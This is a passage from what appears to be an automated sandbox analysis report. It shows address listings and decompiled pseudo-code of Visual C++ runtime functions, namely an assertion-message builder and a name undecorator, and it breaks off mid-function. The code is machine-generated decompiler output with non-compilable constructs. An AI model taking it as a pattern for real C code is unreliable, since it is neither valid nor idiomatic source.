                                                                                              0x01360ee4
                                                                                              0x01360ee9
                                                                                              0x01360ef6
                                                                                              0x01360f03
                                                                                              0x01360f08
                                                                                              0x01360f08
                                                                                              0x01360f16
                                                                                              0x01360f1a
                                                                                              0x01360f2d
                                                                                              0x01360f34
                                                                                              0x01360f37
                                                                                              0x01360f1c
                                                                                              0x01360f1c
                                                                                              0x01360f23
                                                                                              0x01360f26
                                                                                              0x01360f26
                                                                                              0x01360f4a
                                                                                              0x01360f4f
                                                                                              0x01360f5e
                                                                                              0x01360f5f
                                                                                              0x01360f7c
                                                                                              0x01360f61
                                                                                              0x01360f6b
                                                                                              0x01360f6b
                                                                                              0x01360f83
                                                                                              0x01360fa0
                                                                                              0x00000000
                                                                                              0x01360f85
                                                                                              0x01360f88
                                                                                              0x01360f8d
                                                                                              0x01360f90
                                                                                              0x01360f96
                                                                                              0x01360f9b
                                                                                              0x00000000
                                                                                              0x01360f9b
                                                                                              0x01360f83
                                                                                              0x01360cbd
                                                                                              0x01360d60
                                                                                              0x01360d60
                                                                                              0x01360d61
                                                                                              0x01360cc3
                                                                                              0x01360cc6
                                                                                              0x01360cd1
                                                                                              0x01360ce5
                                                                                              0x01360ce7
                                                                                              0x01360cef
                                                                                              0x01360cf5
                                                                                              0x01360cf8
                                                                                              0x01360d00
                                                                                              0x01360d47
                                                                                              0x01360d4f
                                                                                              0x01360d52
                                                                                              0x01360d02
                                                                                              0x01360d12
                                                                                              0x01360d17
                                                                                              0x01360d24
                                                                                              0x01360d2b
                                                                                              0x01360d2e
                                                                                              0x01360d2e
                                                                                              0x01360d55
                                                                                              0x01360d5b
                                                                                              0x01360d5b
                                                                                              0x01360d67
                                                                                              0x01360d6b
                                                                                              0x01360e0b
                                                                                              0x00000000
                                                                                              0x01360d71
                                                                                              0x01360d73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360d79
                                                                                              0x01360d82
                                                                                              0x01360d8d
                                                                                              0x01360d8e
                                                                                              0x01360de7
                                                                                              0x01360dee
                                                                                              0x01360df1
                                                                                              0x01360d90
                                                                                              0x01360d90
                                                                                              0x01360d96
                                                                                              0x01360d9b
                                                                                              0x01360d9e
                                                                                              0x01360d9e
                                                                                              0x00000000
                                                                                              0x01360d8e
                                                                                              0x01360d6b
                                                                                              0x01360c59
                                                                                              0x01360c5d
                                                                                              0x00000000
                                                                                              0x01360c63
                                                                                              0x01360c66
                                                                                              0x01360c69
                                                                                              0x01360c6a
                                                                                              0x01360c73
                                                                                              0x01360c7a
                                                                                              0x01360c7a
                                                                                              0x00000000
                                                                                              0x01360c73
                                                                                              0x01360c5d

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                                                                              • String ID:
                                                                                              • API String ID: 1186856153-0
                                                                                              • Opcode ID: 9e840084fb294bd8ff893f7d1eac3a3a5ad412983d94c31665c0df6ab58559e6
                                                                                              • Instruction ID: 81b372c19a64e1c2c14efebf124145b41c4e70b30defff122f5632bd2e9652a8
                                                                                              • Opcode Fuzzy Hash: 9e840084fb294bd8ff893f7d1eac3a3a5ad412983d94c31665c0df6ab58559e6
                                                                                              • Instruction Fuzzy Hash: 6BC1A571900209AFDB1CDFACD891DEDBBBDBF18708F004159F646A7288DB709A45CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135965F Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 414COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 41%
                                                                                              			E0135965F(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				short _v532;
				intOrPtr* _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				intOrPtr* _v576;
				intOrPtr* _v580;
				intOrPtr _v584;
				signed int _t78;
				void* _t82;
				void* _t88;
				void* _t89;
				signed int _t93;
				struct HINSTANCE__* _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t100;
				void* _t101;
				intOrPtr _t102;
				void* _t104;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t127;
				intOrPtr _t128;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t136;
				signed int _t137;
				void* _t140;
				void* _t141;
				signed int _t143;
				signed int _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				signed int _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				intOrPtr _t157;
				intOrPtr* _t159;
				void* _t160;
				void* _t162;
				void* _t164;
				char* _t165;
				void* _t166;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t170;
				intOrPtr* _t173;
				intOrPtr* _t175;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr* _t182;
				void* _t186;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				intOrPtr* _t192;
				void* _t195;
				void* _t196;
				signed int _t197;
				intOrPtr _t199;
				void* _t200;
				signed short* _t202;
				intOrPtr* _t204;
				void* _t205;
				signed int _t207;
				signed int _t211;
				void* _t213;
				void* _t215;

				_t172 = __ecx;
				_t207 = _t211;
				_t78 =  *0x139e210; // 0x1911783b
				_v8 = _t78 ^ _t207;
				_push(__ebx);
				_t157 = _a24;
				_push(__esi);
				_t204 = _a4;
				_push(__edi);
				_t199 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t82 = E01367936(_t204, _t199, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t213 = _t211 - 0x228 + 0xc;
				if(_t82 != 0) {
					L65:
					__eflags = 0;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01364C6E();
					asm("int3");
					_push(_t207);
					_push( *_v576);
					_push( *_v580);
					return E0136FC6E(_t172, _t199, _v584);
				} else {
					_push(L"\n\n");
					_push(_t199);
					_t88 = E013678B3(_t204);
					_t213 = _t213 + 0xc;
					if(_t88 != 0) {
						goto L65;
					} else {
						_push( &M0139B818);
						_push(_t199);
						_t89 = E013678B3(_t204);
						_t213 = _t213 + 0xc;
						if(_t89 != 0) {
							goto L65;
						} else {
							E01354D30(_t199,  &_v532, _t89, 0x20a);
							_t215 = _t213 + 0xc;
							_v548 = 0;
							_t93 =  &_v548;
							__imp__GetModuleHandleExW(6, _t157, _t93);
							_t172 =  &_v532;
							asm("sbb eax, eax");
							_t95 =  ~_t93 & _v548;
							_v548 = _t95;
							if(GetModuleFileNameW(_t95,  &_v532, 0x105) != 0) {
								L6:
								_t159 =  &_v532;
								_t173 = _t159;
								_t189 = _t173 + 2;
								do {
									_t97 =  *_t173;
									_t173 = _t173 + 2;
								} while (_t97 != _v540);
								_t172 = _t173 - _t189 >> 1;
								if(_t172 + 0xb <= 0x40) {
									L10:
									_push(_t159);
									_push(_t199);
									_t99 = E013678B3(_t204);
									_t213 = _t215 + 0xc;
									if(_t99 != 0) {
										goto L65;
									} else {
										_push("\n");
										_push(_t199);
										_t100 = E013678B3(_t204);
										_t213 = _t213 + 0xc;
										if(_t100 != 0) {
											goto L65;
										} else {
											_push(L"File: ");
											_push(_t199);
											_t101 = E013678B3(_t204);
											_t213 = _t213 + 0xc;
											if(_t101 != 0) {
												goto L65;
											} else {
												_t190 = _v536;
												_t175 = _t190;
												_t160 = _t175 + 2;
												do {
													_t102 =  *_t175;
													_t175 = _t175 + 2;
												} while (_t102 != _v540);
												_t172 = _t175 - _t160 >> 1;
												if((_t175 - _t160 >> 1) + 8 <= 0x40) {
													_push(_t190);
													goto L34;
												} else {
													_t167 = _t190;
													_t186 = _t167 + 2;
													do {
														_t128 =  *_t167;
														_t167 = _t167 + 2;
													} while (_t128 != _v540);
													_v544 = 0x5c;
													_t169 = _t167 - _t186 >> 1;
													_t172 = 1;
													_t129 =  *(_t190 + _t169 * 2 - 2) & 0x0000ffff;
													if(_t129 != _v544) {
														_v556 = _t129;
														_t202 = _t190 - 2 + _t169 * 2;
														_t197 = _t129;
														while(_t197 != 0x2f && _t172 < _t169) {
															_t202 = _t202 - 2;
															_t172 = _t172 + 1;
															_t151 =  *_t202 & 0x0000ffff;
															_t197 = _t151;
															if(_t151 != _v544) {
																continue;
															}
															break;
														}
														_t199 = _a8;
														_t190 = _v536;
													}
													_t131 = _t169 - _t172;
													_v544 = _t131;
													if(_t131 <= 0x26) {
														if(__eflags >= 0) {
															goto L57;
														} else {
															_t141 = 0x35;
															_t172 = _t172 >> 1;
															_v556 = _t172;
															_push(_t141 - _t172);
															_t143 = E013679FE(_t172, _t204, _t199, _t190);
															_t213 = _t213 + 0x10;
															__eflags = _t143;
															if(_t143 != 0) {
																goto L65;
															} else {
																_push(L"...");
																_push(_t199);
																_t144 = E013678B3(_t204);
																_t213 = _t213 + 0xc;
																__eflags = _t144;
																if(_t144 != 0) {
																	goto L65;
																} else {
																	_t170 = _t169 - _v556;
																	__eflags = _t170;
																	_t140 = _v536 + _t170 * 2;
																	goto L33;
																}
															}
														}
													} else {
														if(_t172 >= 0x12) {
															L57:
															_push(0x23);
															_t132 = E013679FE(_t172, _t204, _t199, _t190);
															_t213 = _t213 + 0x10;
															__eflags = _t132;
															if(_t132 != 0) {
																goto L65;
															} else {
																_push(L"...");
																_push(_t199);
																_t133 = E013678B3(_t204);
																_t213 = _t213 + 0xc;
																__eflags = _t133;
																if(_t133 != 0) {
																	goto L65;
																} else {
																	_t172 = _v544;
																	_push(8);
																	_t136 = E013679FE(_v544, _t204, _t199, _v536 + _v544 * 2);
																	_t213 = _t213 + 0x10;
																	__eflags = _t136;
																	if(_t136 != 0) {
																		goto L65;
																	} else {
																		_push(L"...");
																		_push(_t199);
																		_t137 = E013678B3(_t204);
																		_t213 = _t213 + 0xc;
																		__eflags = _t137;
																		if(_t137 != 0) {
																			goto L65;
																		} else {
																			_t140 = _v536 + _t169 * 2 + 0xfffffff2;
																			goto L33;
																		}
																	}
																}
															}
														} else {
															_t146 = 0x35;
															_push(_t146 - _t172);
															_t148 = E013679FE(_t172, _t204, _t199, _t190);
															_t213 = _t213 + 0x10;
															if(_t148 != 0) {
																goto L65;
															} else {
																_push(L"...");
																_push(_t199);
																_t149 = E013678B3(_t204);
																_t213 = _t213 + 0xc;
																if(_t149 != 0) {
																	goto L65;
																} else {
																	_t172 = _v544;
																	_t140 = _v536 + _v544 * 2;
																	L33:
																	_push(_t140);
																	L34:
																	_push(_t199);
																	_t104 = E013678B3(_t204);
																	_t213 = _t213 + 0xc;
																	if(_t104 != 0) {
																		goto L65;
																	} else {
																		_push("\n");
																		_push(_t199);
																		_t105 = E013678B3(_t204);
																		_t213 = _t213 + 0xc;
																		if(_t105 != 0) {
																			goto L65;
																		} else {
																			_push(L"Line: ");
																			_push(_t199);
																			_t106 = E013678B3(_t204);
																			_t213 = _t213 + 0xc;
																			if(_t106 != 0) {
																				goto L65;
																			} else {
																				_t177 = _t204;
																				_t191 = _t177 + 2;
																				do {
																					_t107 =  *_t177;
																					_t177 = _t177 + 2;
																				} while (_t107 != 0);
																				_t192 = _t204;
																				_t172 = _t177 - _t191 >> 1;
																				_t162 = _t192 + 2;
																				do {
																					_t108 =  *_t192;
																					_t192 = _t192 + 2;
																				} while (_t108 != _v540);
																				_t112 = E0137033D(_t172, _a20, _t204 + (_t192 - _t162 >> 1) * 2, _t199 - _t172, 0xa);
																				_t213 = _t213 + 0x10;
																				if(_t112 != 0) {
																					goto L65;
																				} else {
																					_push(L"\n\n");
																					_push(_t199);
																					_t113 = E013678B3(_t204);
																					_t213 = _t213 + 0xc;
																					if(_t113 != 0) {
																						goto L65;
																					} else {
																						_push(L"Expression: ");
																						_push(_t199);
																						_t114 = E013678B3(_t204);
																						_t213 = _t213 + 0xc;
																						if(_t114 != 0) {
																							goto L65;
																						} else {
																							_t179 = _t204;
																							_t195 = _t179 + 2;
																							do {
																								_t115 =  *_t179;
																								_t179 = _t179 + 2;
																							} while (_t115 != 0);
																							_t196 = (_t179 - _t195 >> 1) + 0xb0;
																							_t182 = _v552;
																							_t164 = _t182 + 2;
																							do {
																								_t116 =  *_t182;
																								_t182 = _t182 + 2;
																							} while (_t116 != _v540);
																							_t172 = _t182 - _t164 >> 1;
																							if((_t182 - _t164 >> 1) + _t196 <= _t199) {
																								_push(_v552);
																								goto L51;
																							} else {
																								_push(_t199 - _t196 - 3);
																								_t127 = E013679FE(_t172, _t204, _t199, _v552);
																								_t213 = _t213 + 0x10;
																								if(_t127 != 0) {
																									goto L65;
																								} else {
																									_push(L"...");
																									L51:
																									_push(_t199);
																									_t118 = E013678B3(_t204);
																									_t213 = _t213 + 0xc;
																									if(_t118 != 0) {
																										goto L65;
																									} else {
																										_t165 = L"\n\n";
																										_push(_t165);
																										_push(_t199);
																										_t119 = E013678B3(_t204);
																										_t213 = _t213 + 0xc;
																										if(_t119 != 0) {
																											goto L65;
																										} else {
																											_push(L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																											_push(_t199);
																											_t120 = E013678B3(_t204);
																											_t213 = _t213 + 0xc;
																											if(_t120 != 0) {
																												goto L65;
																											} else {
																												_push(_t165);
																												_push(_t199);
																												_t121 = E013678B3(_t204);
																												_t213 = _t213 + 0xc;
																												if(_t121 != 0) {
																													goto L65;
																												} else {
																													_push(L"(Press Retry to debug the application - JIT must be enabled)");
																													_push(_t199);
																													_t122 = E013678B3(_t204);
																													_t213 = _t213 + 0xc;
																													if(_t122 != 0) {
																														goto L65;
																													} else {
																														_pop(_t200);
																														_pop(_t205);
																														_pop(_t166);
																														return E01353E0D(_t122, _t166, _v8 ^ _t207, _t196, _t200, _t205);
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t152 = _t172 * 2 - 0x6a;
									_t172 = 0x20a - _t152;
									_t159 =  &_v532 + _t152;
									_t153 = E01358BD5(_t159, 0x20a - _t152, L"...", 6);
									_t213 = _t215 + 0x10;
									if(_t153 != 0) {
										goto L65;
									} else {
										goto L10;
									}
								}
							} else {
								_t155 = E01367936( &_v532, 0x105, L"<program name unknown>");
								_t213 = _t215 + 0xc;
								if(_t155 != 0) {
									goto L65;
								} else {
									goto L6;
								}
							}
						}
					}
				}
			}



























































































                                                                                              0x0135965f
                                                                                              0x01359662
                                                                                              0x0135966a
                                                                                              0x01359671
                                                                                              0x01359677
                                                                                              0x01359678
                                                                                              0x0135967b
                                                                                              0x0135967c
                                                                                              0x0135967f
                                                                                              0x01359680
                                                                                              0x01359688
                                                                                              0x01359693
                                                                                              0x01359699
                                                                                              0x0135969e
                                                                                              0x013596a5
                                                                                              0x013596aa
                                                                                              0x01359b34
                                                                                              0x01359b34
                                                                                              0x01359b36
                                                                                              0x01359b37
                                                                                              0x01359b38
                                                                                              0x01359b39
                                                                                              0x01359b3a
                                                                                              0x01359b3b
                                                                                              0x01359b40
                                                                                              0x01359b43
                                                                                              0x01359b49
                                                                                              0x01359b4e
                                                                                              0x01359b5c
                                                                                              0x013596b0
                                                                                              0x013596b0
                                                                                              0x013596b5
                                                                                              0x013596b7
                                                                                              0x013596bc
                                                                                              0x013596c1
                                                                                              0x00000000
                                                                                              0x013596c7
                                                                                              0x013596c7
                                                                                              0x013596cc
                                                                                              0x013596ce
                                                                                              0x013596d3
                                                                                              0x013596d8
                                                                                              0x00000000
                                                                                              0x013596de
                                                                                              0x013596eb
                                                                                              0x013596f0
                                                                                              0x013596f5
                                                                                              0x013596fb
                                                                                              0x01359705
                                                                                              0x0135970d
                                                                                              0x01359719
                                                                                              0x0135971b
                                                                                              0x01359723
                                                                                              0x01359731
                                                                                              0x01359750
                                                                                              0x01359750
                                                                                              0x01359756
                                                                                              0x01359758
                                                                                              0x0135975b
                                                                                              0x0135975b
                                                                                              0x0135975e
                                                                                              0x01359761
                                                                                              0x0135976c
                                                                                              0x01359774
                                                                                              0x013597a5
                                                                                              0x013597a5
                                                                                              0x013597a6
                                                                                              0x013597a8
                                                                                              0x013597ad
                                                                                              0x013597b2
                                                                                              0x00000000
                                                                                              0x013597b8
                                                                                              0x013597b8
                                                                                              0x013597bd
                                                                                              0x013597bf
                                                                                              0x013597c4
                                                                                              0x013597c9
                                                                                              0x00000000
                                                                                              0x013597cf
                                                                                              0x013597cf
                                                                                              0x013597d4
                                                                                              0x013597d6
                                                                                              0x013597db
                                                                                              0x013597e0
                                                                                              0x00000000
                                                                                              0x013597e6
                                                                                              0x013597e6
                                                                                              0x013597ec
                                                                                              0x013597ee
                                                                                              0x013597f1
                                                                                              0x013597f1
                                                                                              0x013597f4
                                                                                              0x013597f7
                                                                                              0x01359802
                                                                                              0x0135980a
                                                                                              0x01359b14
                                                                                              0x00000000
                                                                                              0x01359810
                                                                                              0x01359810
                                                                                              0x01359812
                                                                                              0x01359815
                                                                                              0x01359815
                                                                                              0x01359818
                                                                                              0x0135981b
                                                                                              0x01359826
                                                                                              0x01359830
                                                                                              0x01359834
                                                                                              0x01359835
                                                                                              0x01359841
                                                                                              0x01359846
                                                                                              0x0135984c
                                                                                              0x0135984f
                                                                                              0x01359851
                                                                                              0x0135985b
                                                                                              0x0135985e
                                                                                              0x0135985f
                                                                                              0x01359862
                                                                                              0x0135986b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135986b
                                                                                              0x0135986d
                                                                                              0x01359870
                                                                                              0x01359870
                                                                                              0x01359878
                                                                                              0x0135987a
                                                                                              0x01359883
                                                                                              0x013598cf
                                                                                              0x00000000
                                                                                              0x013598d5
                                                                                              0x013598d7
                                                                                              0x013598d8
                                                                                              0x013598dc
                                                                                              0x013598e2
                                                                                              0x013598e6
                                                                                              0x013598eb
                                                                                              0x013598ee
                                                                                              0x013598f0
                                                                                              0x00000000
                                                                                              0x013598f6
                                                                                              0x013598f6
                                                                                              0x013598fb
                                                                                              0x013598fd
                                                                                              0x01359902
                                                                                              0x01359905
                                                                                              0x01359907
                                                                                              0x00000000
                                                                                              0x0135990d
                                                                                              0x0135990d
                                                                                              0x0135990d
                                                                                              0x01359919
                                                                                              0x00000000
                                                                                              0x01359919
                                                                                              0x01359907
                                                                                              0x013598f0
                                                                                              0x01359885
                                                                                              0x01359888
                                                                                              0x01359aac
                                                                                              0x01359aac
                                                                                              0x01359ab1
                                                                                              0x01359ab6
                                                                                              0x01359ab9
                                                                                              0x01359abb
                                                                                              0x00000000
                                                                                              0x01359abd
                                                                                              0x01359abd
                                                                                              0x01359ac2
                                                                                              0x01359ac4
                                                                                              0x01359ac9
                                                                                              0x01359acc
                                                                                              0x01359ace
                                                                                              0x00000000
                                                                                              0x01359ad0
                                                                                              0x01359ad0
                                                                                              0x01359adc
                                                                                              0x01359ae4
                                                                                              0x01359ae9
                                                                                              0x01359aec
                                                                                              0x01359aee
                                                                                              0x00000000
                                                                                              0x01359af0
                                                                                              0x01359af0
                                                                                              0x01359af5
                                                                                              0x01359af7
                                                                                              0x01359afc
                                                                                              0x01359aff
                                                                                              0x01359b01
                                                                                              0x00000000
                                                                                              0x01359b03
                                                                                              0x01359b0c
                                                                                              0x00000000
                                                                                              0x01359b0c
                                                                                              0x01359b01
                                                                                              0x01359aee
                                                                                              0x01359ace
                                                                                              0x0135988e
                                                                                              0x01359890
                                                                                              0x01359893
                                                                                              0x01359897
                                                                                              0x0135989c
                                                                                              0x013598a1
                                                                                              0x00000000
                                                                                              0x013598a7
                                                                                              0x013598a7
                                                                                              0x013598ac
                                                                                              0x013598ae
                                                                                              0x013598b3
                                                                                              0x013598b8
                                                                                              0x00000000
                                                                                              0x013598be
                                                                                              0x013598c4
                                                                                              0x013598ca
                                                                                              0x0135991c
                                                                                              0x0135991c
                                                                                              0x0135991d
                                                                                              0x0135991d
                                                                                              0x0135991f
                                                                                              0x01359924
                                                                                              0x01359929
                                                                                              0x00000000
                                                                                              0x0135992f
                                                                                              0x0135992f
                                                                                              0x01359934
                                                                                              0x01359936
                                                                                              0x0135993b
                                                                                              0x01359940
                                                                                              0x00000000
                                                                                              0x01359946
                                                                                              0x01359946
                                                                                              0x0135994b
                                                                                              0x0135994d
                                                                                              0x01359952
                                                                                              0x01359957
                                                                                              0x00000000
                                                                                              0x0135995d
                                                                                              0x0135995d
                                                                                              0x01359961
                                                                                              0x01359964
                                                                                              0x01359964
                                                                                              0x01359967
                                                                                              0x0135996a
                                                                                              0x01359971
                                                                                              0x01359973
                                                                                              0x01359975
                                                                                              0x01359978
                                                                                              0x01359978
                                                                                              0x0135997b
                                                                                              0x0135997e
                                                                                              0x01359999
                                                                                              0x0135999e
                                                                                              0x013599a3
                                                                                              0x00000000
                                                                                              0x013599a9
                                                                                              0x013599a9
                                                                                              0x013599ae
                                                                                              0x013599b0
                                                                                              0x013599b5
                                                                                              0x013599ba
                                                                                              0x00000000
                                                                                              0x013599c0
                                                                                              0x013599c0
                                                                                              0x013599c5
                                                                                              0x013599c7
                                                                                              0x013599cc
                                                                                              0x013599d1
                                                                                              0x00000000
                                                                                              0x013599d7
                                                                                              0x013599d7
                                                                                              0x013599db
                                                                                              0x013599de
                                                                                              0x013599de
                                                                                              0x013599e1
                                                                                              0x013599e4
                                                                                              0x013599ed
                                                                                              0x013599f3
                                                                                              0x013599f9
                                                                                              0x013599fc
                                                                                              0x013599fc
                                                                                              0x013599ff
                                                                                              0x01359a02
                                                                                              0x01359a0d
                                                                                              0x01359a14
                                                                                              0x01359b1a
                                                                                              0x00000000
                                                                                              0x01359a1a
                                                                                              0x01359a21
                                                                                              0x01359a2a
                                                                                              0x01359a2f
                                                                                              0x01359a34
                                                                                              0x00000000
                                                                                              0x01359a3a
                                                                                              0x01359a3a
                                                                                              0x01359a3f
                                                                                              0x01359a3f
                                                                                              0x01359a41
                                                                                              0x01359a46
                                                                                              0x01359a4b
                                                                                              0x00000000
                                                                                              0x01359a51
                                                                                              0x01359a51
                                                                                              0x01359a56
                                                                                              0x01359a57
                                                                                              0x01359a59
                                                                                              0x01359a5e
                                                                                              0x01359a63
                                                                                              0x00000000
                                                                                              0x01359a69
                                                                                              0x01359a69
                                                                                              0x01359a6e
                                                                                              0x01359a70
                                                                                              0x01359a75
                                                                                              0x01359a7a
                                                                                              0x00000000
                                                                                              0x01359a80
                                                                                              0x01359a80
                                                                                              0x01359a81
                                                                                              0x01359a83
                                                                                              0x01359a88
                                                                                              0x01359a8d
                                                                                              0x00000000
                                                                                              0x01359a93
                                                                                              0x01359a93
                                                                                              0x01359a98
                                                                                              0x01359a9a
                                                                                              0x01359a9f
                                                                                              0x01359aa4
                                                                                              0x00000000
                                                                                              0x01359aaa
                                                                                              0x01359b28
                                                                                              0x01359b29
                                                                                              0x01359b2c
                                                                                              0x01359b33
                                                                                              0x01359b33
                                                                                              0x01359aa4
                                                                                              0x01359a8d
                                                                                              0x01359a7a
                                                                                              0x01359a63
                                                                                              0x01359a4b
                                                                                              0x01359a34
                                                                                              0x01359a14
                                                                                              0x013599d1
                                                                                              0x013599ba
                                                                                              0x013599a3
                                                                                              0x01359957
                                                                                              0x01359940
                                                                                              0x01359929
                                                                                              0x013598b8
                                                                                              0x013598a1
                                                                                              0x01359888
                                                                                              0x01359883
                                                                                              0x0135980a
                                                                                              0x013597e0
                                                                                              0x013597c9
                                                                                              0x01359776
                                                                                              0x01359776
                                                                                              0x01359789
                                                                                              0x01359791
                                                                                              0x01359795
                                                                                              0x0135979a
                                                                                              0x0135979f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135979f
                                                                                              0x01359733
                                                                                              0x01359740
                                                                                              0x01359745
                                                                                              0x0135974a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135974a
                                                                                              0x01359731
                                                                                              0x013596d8
                                                                                              0x013596c1

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01359705
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01359729
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Module$FileHandleName
                                                                                              • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                                                              • API String ID: 4146042529-3261600717
                                                                                              • Opcode ID: 01aedbdd3373729122590f73af6127bf99f885ea665f0911b6b90407a84b5524
                                                                                              • Instruction ID: 07cd4c74dbb8cbf722f23b733712f6b7d7cd552dda841efc2cca8be19b9d0df2
                                                                                              • Opcode Fuzzy Hash: 01aedbdd3373729122590f73af6127bf99f885ea665f0911b6b90407a84b5524
                                                                                              • Instruction Fuzzy Hash: AED10D31A0010AA7EF21AA2D9D49FAF777DDF68F0CF444169EC05D620AF6709E41CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135CD2F Relevance: 19.8, APIs: 13, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E0135CD2F(void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v148;
				char _v156;
				char _v164;
				char _v172;
				char _v180;
				char _v188;
				char _v196;
				char _v204;
				char _v212;
				char _v220;
				char _v228;
				char _v236;
				char _v244;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t93;
				intOrPtr _t94;
				intOrPtr* _t95;
				intOrPtr _t96;
				signed int* _t99;
				char* _t102;
				void* _t104;
				signed int* _t105;
				void* _t109;
				void* _t112;
				void* _t121;
				char* _t122;
				void* _t126;
				void* _t128;
				char* _t132;
				void* _t134;
				void* _t135;
				void* _t138;
				char* _t144;
				void* _t147;
				signed int* _t156;
				signed int _t167;
				char* _t177;
				signed int* _t179;
				char* _t180;
				intOrPtr* _t185;
				signed int* _t189;
				signed int* _t194;
				signed int _t199;
				signed int* _t202;
				void* _t206;
				signed int* _t209;
				void* _t210;

				_t206 = __edx;
				_t209 = _a4;
				 *_t209 =  *_t209 & 0x00000000;
				_t209[1] = _t209[1] & 0x00000000;
				_t167 = 0;
				while(1) {
					_t93 =  *0x13a0b18; // 0x0
					_t94 =  *_t93;
					if(_t94 == 0 || _t94 == 0x40) {
						break;
					}
					if( *0x13a0b24 == 0 ||  *0x13a0b25 != 0) {
						if( *_t209 != 0) {
							_v44 = "::";
							_v40 = 2;
							_t188 = E0135B77F( &_v108,  &_v44);
							E0135BB4B(_t159,  &_v52, _t209);
							 *_t209 = _v52;
							_t209[1] = _v48;
							if(_t167 != 0) {
								_t189 = E0135BE4F(_t188,  &_v116, 0x5b, _t209);
								_t210 = _t210 + 0xc;
								_t167 = 0;
								 *_t209 =  *_t189;
								_t209[1] = _t189[1];
							}
						}
						_t102 =  *0x13a0b18; // 0x0
						if( *_t102 != 0x3f) {
							_t104 = E0135C1FB(_t206, _t207,  &_v92, 1, 0);
							_t177 =  &_v100;
							L37:
							_t210 = _t210 + 0xc;
							L38:
							_t105 = E0135BB4B(_t104, _t177, _t209);
							L39:
							_t179 = _t105;
							 *_t209 =  *_t179;
							_t209[1] = _t179[1];
							L40:
							if(_t209[1] == 0) {
								continue;
							}
							break;
						}
